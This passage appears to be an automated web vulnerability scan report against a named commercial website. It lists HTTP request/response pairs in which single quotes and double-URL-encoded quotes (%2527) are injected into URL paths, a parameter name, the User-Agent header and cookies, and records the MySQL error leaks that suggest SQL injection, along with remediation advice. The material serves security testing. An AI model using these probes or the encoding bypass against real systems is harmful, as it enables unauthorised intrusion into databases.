7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 05:33:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 05:33:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /modules%2527%2527/mod_fpss/includes/elements/categories.php HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:33:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /modules/mod_fpss/includes/elements/categories.php%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 04:11:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 04:11:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /modules/mod_fpss/includes/elements/categories.php%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:11:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /modules/mod_fpss/includes/elements/header.php%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 05:36:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 05:36:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /modules/mod_fpss/includes/elements/header.php%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/includes/elements/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 05:36:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /modules%2527/mod_fpss/tmpl/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 03:52:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 03:52:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /modules%2527%2527/mod_fpss/tmpl/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:52:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /plugins%2527/system/pc_includes/JSON.php HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/plugins/system/pc_includes/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 04:11:57 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 04:11:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /plugins%2527%2527/system/pc_includes/JSON.php HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/plugins/system/pc_includes/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:11:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.212. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/products.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products.html?start=4&1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products.html?start=4&1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:45:54 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:45:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:37:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /products/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:37:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
